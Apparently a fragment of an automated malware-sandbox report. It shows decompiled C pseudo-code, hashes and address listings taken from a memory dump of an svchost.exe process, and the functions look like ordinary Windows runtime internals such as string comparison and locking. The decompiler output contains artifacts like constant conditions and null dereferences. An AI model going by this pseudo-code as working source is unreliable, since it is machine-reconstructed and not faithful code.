                                          0x03a80e7d
                                          0x03a80e84
                                          0x03a80e88
                                          0x03a80e8a
                                          0x03a80e8d
                                          0x03a80e9e
                                          0x03a80ea3
                                          0x03a80ea3
                                          0x03a80ea7
                                          0x03a80eaf
                                          0x03a80eb3
                                          0x03a80eb9
                                          0x03a80eb9
                                          0x03a80ebc
                                          0x03a80ecd
                                          0x03a80ecd
                                          0x00000000
                                          0x03a80eb3
                                          0x03a80e21
                                          0x03a80e2b
                                          0x03a80e2f
                                          0x03a80e30
                                          0x03a80e3a
                                          0x03a80e3f
                                          0x03a80e41
                                          0x00000000
                                          0x00000000
                                          0x03a80e47
                                          0x00000000
                                          0x03a80e47
                                          0x03a80df9
                                          0x03a80dfe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a80dfe
                                          0x03a25303
                                          0x03a25307
                                          0x00000000
                                          0x03a25309
                                          0x00000000
                                          0x03a25309
                                          0x03a25307
                                          0x03a252e9
                                          0x03a252e9
                                          0x00000000
                                          0x03a252e9
                                          0x03a2530e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06b088d0cfe8fbce556114c93b85e5828b3f97427b4eb216c07a24e945b85fe2
                                          • Instruction ID: 2f1415ea44ce82524f57d83dcf46257bacb909851b97d30e5937c8fc84f6a241
                                          • Opcode Fuzzy Hash: 06b088d0cfe8fbce556114c93b85e5828b3f97427b4eb216c07a24e945b85fe2
                                          • Instruction Fuzzy Hash: C551AA75605741AFC321EF68CA41B2BBBE8BF45714F18491FE4958B691E770E808CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A52AE4 Relevance: .2, Instructions: 159COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03A52AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3b18204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3b18208; // 0x3b18207
				_t8 = _t57 + 0x3b18208; // 0x3b18207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3b18450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x3b1821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3b16d5c; // 0x7f340654
							_t72 =  *0x3b16d5c; // 0x7f340654
							_t75 =  *0x3b16d5c; // 0x7f340654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3b16d5c; // 0x7f340654
							_t84 =  *0x3b16d5c; // 0x7f340654
							_t87 =  *0x3b16d5c; // 0x7f340654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E03A6F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                          0x03a52ae4
                                          0x03a52aec
                                          0x03a52aef
                                          0x03a52af4
                                          0x03a52af7
                                          0x03a52afd
                                          0x03a52b92
                                          0x03a52b92
                                          0x03a52b97
                                          0x03a52b9c
                                          0x03a52b9c
                                          0x03a52b03
                                          0x03a52b06
                                          0x03a52b09
                                          0x03a52b09
                                          0x03a52b0f
                                          0x03a52b15
                                          0x03a52b15
                                          0x03a52b1b
                                          0x03a52b1e
                                          0x03a52b21
                                          0x03a52b26
                                          0x03a52b29
                                          0x03a52b81
                                          0x03a52b84
                                          0x03a52c0e
                                          0x03a52c15
                                          0x03a52c24
                                          0x03a52c24
                                          0x03a52b8a
                                          0x03a52b8a
                                          0x03a52b8a
                                          0x03a52b8a
                                          0x03a52b90
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a52b4a
                                          0x03a52b4a
                                          0x03a52b4d
                                          0x03a52b53
                                          0x00000000
                                          0x00000000
                                          0x03a52b55
                                          0x03a52b58
                                          0x03a52bb7
                                          0x03a95d1b
                                          0x03a95d37
                                          0x03a95d47
                                          0x03a95d53
                                          0x03a52bbd
                                          0x03a52bbd
                                          0x03a52bbd
                                          0x03a52bb7
                                          0x03a52b5d
                                          0x03a52c2f
                                          0x03a95d5b
                                          0x03a95d77
                                          0x03a95d87
                                          0x03a95d93
                                          0x03a52c35
                                          0x03a52c35
                                          0x03a52c35
                                          0x03a52c2f
                                          0x03a52b65
                                          0x03a52b9f
                                          0x03a52ba2
                                          0x03a52b67
                                          0x03a52b67
                                          0x03a52b69
                                          0x03a52b6b
                                          0x03a52b6e
                                          0x03a52bc9
                                          0x03a52bcc
                                          0x03a52bcf
                                          0x03a52bd4
                                          0x03a52bd6
                                          0x03a52bd6
                                          0x03a52bdb
                                          0x03a52c02
                                          0x03a52c05
                                          0x03a52c07
                                          0x00000000
                                          0x03a52c07
                                          0x03a52be0
                                          0x03a52c00
                                          0x03a52c3f
                                          0x03a52c3f
                                          0x00000000
                                          0x03a52c00
                                          0x03a52be5
                                          0x03a52be7
                                          0x03a52bec
                                          0x03a52bf4
                                          0x03a52bf6
                                          0x00000000
                                          0x03a52bf6
                                          0x03a52b70
                                          0x03a52b76
                                          0x03a52b2b
                                          0x03a52b2b
                                          0x03a52b2d
                                          0x03a52b2f
                                          0x03a52b32
                                          0x03a52b35
                                          0x03a52b3a
                                          0x00000000
                                          0x03a52b40
                                          0x03a52b43
                                          0x03a52b45
                                          0x03a52b47
                                          0x03a52b4a
                                          0x03a52b4d
                                          0x03a52b53
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a52b53
                                          0x03a52b78
                                          0x03a52b78
                                          0x03a52b7b
                                          0x03a52b7e
                                          0x00000000
                                          0x03a52b7e
                                          0x03a52b76
                                          0x03a52ba5
                                          0x03a52ba5
                                          0x03a52ba8
                                          0x03a52bad
                                          0x00000000
                                          0x00000000
                                          0x03a52baf
                                          0x03a52baf
                                          0x03a52bc2
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8abe8a9157747bff5238715f74711cfc3e420f420a8240742ed9059c6d4096f
                                          • Instruction ID: d0469853dd44d04fc85a044a9260dbc785e2a3d653ac30b5eff9eb1ff39dd2fd
                                          • Opcode Fuzzy Hash: b8abe8a9157747bff5238715f74711cfc3e420f420a8240742ed9059c6d4096f
                                          • Instruction Fuzzy Hash: 79518CB6E001258FCB18DF1DC890ABDB7B5FB88704716895BFC56AB325D730AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AEAE44 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E03AEAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E03AEC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E03AEACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E03AEFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E03AEEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03A47D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03AE1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03AF1536(0x3b18ae4, (_t74 -  *0x3b18b04 >> 0x14) + (_t74 -  *0x3b18b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L03AEC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E03AEA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E03ACCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E03AEACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                          0x03aeae44
                                          0x03aeae4c
                                          0x03aeae53
                                          0x03aeae55
                                          0x03aeae5c
                                          0x03aeae64
                                          0x03aeae68
                                          0x03aeae75
                                          0x03aeae75
                                          0x03aeae78
                                          0x03aeae7a
                                          0x03aeae7c
                                          0x03aeae7f
                                          0x03aeaea8
                                          0x03aeaeab
                                          0x03aeaead
                                          0x00000000
                                          0x00000000
                                          0x03aeaeb3
                                          0x03aeaeb8
                                          0x03aeaebb
                                          0x03aeaebd
                                          0x00000000
                                          0x03aeae81
                                          0x03aeae88
                                          0x03aeae8f
                                          0x03aeae9b
                                          0x03aeae96
                                          0x03aeae96
                                          0x03aeae96
                                          0x03aeaea0
                                          0x03aeaea3
                                          0x03aeaebf
                                          0x03aeaebf
                                          0x03aeaec3
                                          0x03aeaec9
                                          0x03aeaf0d
                                          0x03aeaf14
                                          0x03aeaf3d
                                          0x03aeaf3d
                                          0x03aeaf41
                                          0x03aeaf44
                                          0x03aeaf67
                                          0x03aeaf67
                                          0x03aeaf6a
                                          0x03aeafca
                                          0x03aeafd1
                                          0x00000000
                                          0x03aeafd1
                                          0x03aeaf6c
                                          0x03aeaf6d
                                          0x03aeaf75
                                          0x03aeaf7c
                                          0x03aeaf7e
                                          0x03aeaf80
                                          0x03aeaf85
                                          0x03aeaf87
                                          0x03aeaf99
                                          0x03aeaf89
                                          0x03aeaf92
                                          0x03aeaf92
                                          0x03aeaf9e
                                          0x03aeafa1
                                          0x03aeafa3
                                          0x03aeafa9
                                          0x03aeafb0
                                          0x03aeafb2
                                          0x03aeafb4
                                          0x03aeafbc
                                          0x03aeafbc
                                          0x03aeafb4
                                          0x03aeafb0
                                          0x00000000
                                          0x03aeafa1
                                          0x03aeaf4f
                                          0x03aeaf57
                                          0x03aeaf5c
                                          0x03aeaf5e
                                          0x00000000
                                          0x00000000
                                          0x03aeaf60
                                          0x03aeaf64
                                          0x03aeaf64
                                          0x00000000
                                          0x03aeaf64
                                          0x03aeaf1a
                                          0x03aeaf25
                                          0x00000000
                                          0x00000000
                                          0x03aeaf27
                                          0x03aeaf28
                                          0x03aeaf33
                                          0x00000000
                                          0x03aeaed0
                                          0x03aeaed0
                                          0x03aeaed2
                                          0x03aeaee1
                                          0x03aeaee4
                                          0x00000000
                                          0x00000000
                                          0x03aeaee6
                                          0x03aeaeec
                                          0x00000000
                                          0x00000000
                                          0x03aeaefb
                                          0x03aeaf07
                                          0x03aeafd3
                                          0x03aeafdb
                                          0x03aeafdb
                                          0x00000000
                                          0x03aeaf07
                                          0x03aeaed6
                                          0x03aeaed8
                                          0x03aeaedf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03aeaedf
                                          0x03aeaec9

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e9a0e7312777850b3076320fdd8602f0fa81443e28a40c34d950ec93596c839
                                          • Instruction ID: b2dc1d10fc6eb24e51d3ff80c2c636ec678cd9838c0c5372e17f81c56c734908
                                          • Opcode Fuzzy Hash: 4e9a0e7312777850b3076320fdd8602f0fa81443e28a40c34d950ec93596c839
                                          • Instruction Fuzzy Hash: 6A41B2B1B007119BD72ADB29C994B3BF79AAF84620F08861FF8168B390DB34D841C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4DBE9 Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E03A4DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E03A2CC50(E03A24510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03A47D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03AF8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03A42280(_t58, _v44);
						E03A4DD82(_v44, _t102, _t98);
						E03A4B944(_t102, _v5);
						return E03A3FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3b18628; // 0x0
							_v28 = _t67;
							_t68 =  *0x3b1862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3b18628; // 0x0
						_t105 = _v28;
						_t80 =  *0x3b1862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x3aefb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                          0x03a4dbe9
                                          0x03a4dbf2
                                          0x03a4dbf7
                                          0x03a4dbf9
                                          0x03a4dbfc
                                          0x03a4dc00
                                          0x03a4dc03
                                          0x03a4dc14
                                          0x03a4dd54
                                          0x03a4dd54
                                          0x03a4dd54
                                          0x03a4dc18
                                          0x03a4dc1d
                                          0x03a4dc1d
                                          0x03a4dc32
                                          0x03a4dc3b
                                          0x03a4dc3e
                                          0x03a4dc46
                                          0x03a4dd5b
                                          0x03a4dd62
                                          0x03a4dd64
                                          0x03a4dd67
                                          0x03a4dd69
                                          0x03a4dd6b
                                          0x03a4dd6e
                                          0x03a4dd70
                                          0x03a4dd73
                                          0x03a4dd73
                                          0x00000000
                                          0x03a4dc4c
                                          0x03a4dc4e
                                          0x03a93ae3
                                          0x03a93ae8
                                          0x03a93aea
                                          0x03a4dce7
                                          0x03a4dce9
                                          0x03a4dcec
                                          0x03a4dcee
                                          0x03a4dcf0
                                          0x03a4dcf3
                                          0x03a4dcf5
                                          0x03a93af2
                                          0x03a93af5
                                          0x03a93af5
                                          0x03a4dd06
                                          0x03a4dd08
                                          0x03a4dd0b
                                          0x03a4dd12
                                          0x03a93b08
                                          0x03a4dd18
                                          0x03a4dd18
                                          0x03a4dd18
                                          0x03a4dd20
                                          0x03a4dd23
                                          0x03a93b16
                                          0x03a93b16
                                          0x03a4dd29
                                          0x03a4dd2d
                                          0x03a4dd36
                                          0x03a4dd40
                                          0x03a4dd51
                                          0x03a4dd51
                                          0x03a4dc54
                                          0x03a4dc59
                                          0x03a4dc59
                                          0x03a4dc5e
                                          0x03a4dc5e
                                          0x03a4dc63
                                          0x03a4dc66
                                          0x03a4dc6b
                                          0x03a4dc78
                                          0x03a4dc7b
                                          0x03a4dc81
                                          0x03a4dc81
                                          0x03a4dc83
                                          0x03a4dc89
                                          0x00000000
                                          0x00000000
                                          0x03a4dd7b
                                          0x03a4dd7b
                                          0x03a4dc8f
                                          0x03a4dc8f
                                          0x03a4dc92
                                          0x03a4dc99
                                          0x03a4dc9f
                                          0x03a4dca5
                                          0x03a4dcaa
                                          0x03a4dcaa
                                          0x03a4dcb3
                                          0x03a4dcb8
                                          0x03a4dcbb
                                          0x03a4dcc1
                                          0x03a4dccf
                                          0x03a4dcd2
                                          0x03a4dcd5
                                          0x03a4dcd7
                                          0x03a4dcda
                                          0x03a4dcdc
                                          0x03a4dcdc
                                          0x03a4dce2
                                          0x03a4dce4
                                          0x00000000
                                          0x03a4dce4

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33c2232612de1c04e64d5f07ed085b6a6c0f16cce9ad15215e42f98be0ed0277
                                          • Instruction ID: a537be7bf8788b7aed2a5e11472e6010c77fd29f7560293e15defd11f120c5c5
                                          • Opcode Fuzzy Hash: 33c2232612de1c04e64d5f07ed085b6a6c0f16cce9ad15215e42f98be0ed0277
                                          • Instruction Fuzzy Hash: DD519A75A01215CFCB14CFA8C590AAEFBF5BF88310F24869BD959AB345DB31AD44CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3EF40 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E03A3EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03A29080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03A22D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                          0x03a3ef4b
                                          0x03a3ef4d
                                          0x03a3ef57
                                          0x03a3f0bd
                                          0x03a3f0c2
                                          0x03a3f0d2
                                          0x03a3f0d2
                                          0x03a3f0c2
                                          0x03a3ef5d
                                          0x03a3ef5f
                                          0x03a3ef67
                                          0x03a3ef6a
                                          0x03a3ef6d
                                          0x03a3ef74
                                          0x03a3ef7f
                                          0x03a3ef82
                                          0x03a3ef82
                                          0x03a3ef86
                                          0x03a3ef88
                                          0x03a3ef8c
                                          0x03a3ef8f
                                          0x03a3ef8f
